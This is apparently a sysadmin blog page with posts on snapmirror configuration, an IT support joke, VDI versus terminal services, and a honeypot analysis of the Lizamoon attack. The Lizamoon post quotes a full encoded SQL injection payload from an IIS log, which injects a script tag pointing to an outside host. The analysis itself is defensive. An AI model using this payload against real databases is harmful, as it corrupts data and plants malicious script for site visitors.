Jan
17

Snapmirror initialisation error

I recently encountered a problem snapmirroring between a 2020 in domain x and a 3140c in domain y.

It was an interim configuration as part of a larger project.  Snapmirror was being used as a way of swinging between the two filers in a production environment to minimise downtime.  The fact that the filers were in different AD domainshad no part in the problem.

Preiliminary work such as configuring hosts files, dns and nfs exports had been completed.

Entries had been added to the etc/snapmirror.allow configurationg file

Destination volumes had been created and restricted.

On initialising the snapmirror the following error was encountered:-

 “snapmirror may be misconfigured, the source volume may be busy or unavailable”

As well as editing the snapmirror.allow file I also needed to add a reference to the destionation filer as follows:-

options snapmirror.access host=systemA

systemA can be an ipaddress or Filer name.

 However, I was still getting failures when initialising the snapmirror. 

With a telnet session open to the source filer I attempted the snapmirror initialisation again. 

Whilst I expected another failure it showed that the destination requesting the snapmirror initialisation was coming from a different IP address than expected.

After adding this IP address to the .access option the snapmirror initialsied succesfully.

 

Oct
10

My phone does’nt work

User  – My Phone is broken

IT Support – Hi, We’ll need a bit more info to start with.  Can we get the symptoms of how’s it’s not working and if there was any cause for this?

User – The phone stopped working after I retrieved it from an hour long wash cycle in my washer. I’ve dried it out all weekend and tried it several times but there is nothing happening. I think it is a totally water damaged.

 

Apr
06

Lizamoon – How it attacks databases

The past 10 days has seen a big increase in Lizamoon activity.  Stories about Lizamoon have reported anything from a few thousand site being attacked to 1.5 million.  Some of the sites attacked have been high profile.

So, what does Lizamoon really do?

I created a honeypot site with a windows 2003 server running IIS.  The site was attacked via an http GET statement targeted at a webpage that had a non validated SQL query.  The database had a note field injected with a string of text.  This is a line from the IIS log:-

2011-03-29 12:17:02 192.168.0.25 GET /sub-folder/page.asp rec_id=3251681+update+table_1+set+field_1=REPLACE(cast(field_1+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(108)%2Bchar(105)%2Bchar(122)%2Bchar(97)%2Bchar(109)%2Bchar(111)%2Bchar(111)%2Bchar(110)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))–|49|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. – 95.64.9.18 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) – - www.domain.co.uk 500 2709 1017 9921

You can see that the attack was initiated from 95.64.9.18 and instructed the underlying SQL server to replace the contents of field_1 in table_1 with a string of text.

The SQL statement was crafted to block the rest of the statement from running by disguising as a comment  i.e. –

This style of attack can be mitigated by  parameterized statements and type checking

 

Mar
22

I’m creating Virtual Machines …

I’m creating Virtual Machines Locally with NxTop 3.0 type 1 client hypervisor http://virtualcomputer.com/node/813 #NxTop

Mar
09

Is it worth deploying VDI ?

Over the last couple of days I have configured a POC deployment of XenDesktop over VMWare. Apart from a small stumbling block to do with SSL certificates on the host server it was simple enough to deploy a LAN based XenDesktop environment. Configuring a web based deployment was slightly more challenging but that was more down to my limited test environment in my cupboard/office than anything else.

In the next couple of weeks I hopefully will have time to build a similar text environment with VMWare View. I will compare the two products after tests are complete.

Getting back to the topic in hand, I was debating if there is a good ROI and lower TCO argument in deploying a VDI solution over a TS or physical environment

I have deployed Citrix Metaframe/Presentation Server/Xenapp6/Terminal Services and for the majority of users fail to see why they need anything but the standard set of corporate applications be it the defacto MS Office, the corporate version of CRM or finance system.  You can have a much higher user density with TS than you can with VDI.  Higher Density means fewer server’s and lower cost of infrastructure.

TS & VDI are both a style of Server Based Computing (SBC) and therefore have some of the same limitations such as remote display protocols.  They both provide a much lower TCO over thick provisioning.

So we are only talking about the smaller percentage off users that need to run applications that will not run in a shared server user environment such as TS but will run is a shared server VDI environment.

There are advantages with VDI over TS:-

  • High Availability – Live migration of individual VDI’s
  • The ability suspend your machine and reduce the load on the Host
  • Better Load Balancing
  • Improved software licensing control

As technology marches on the user density gap will narrow between TS and VDI and with it the cost differential will reduce.

For now the first question to ask is “Do my applications require a VDI solution”

Read the rest of this entry »

Older posts «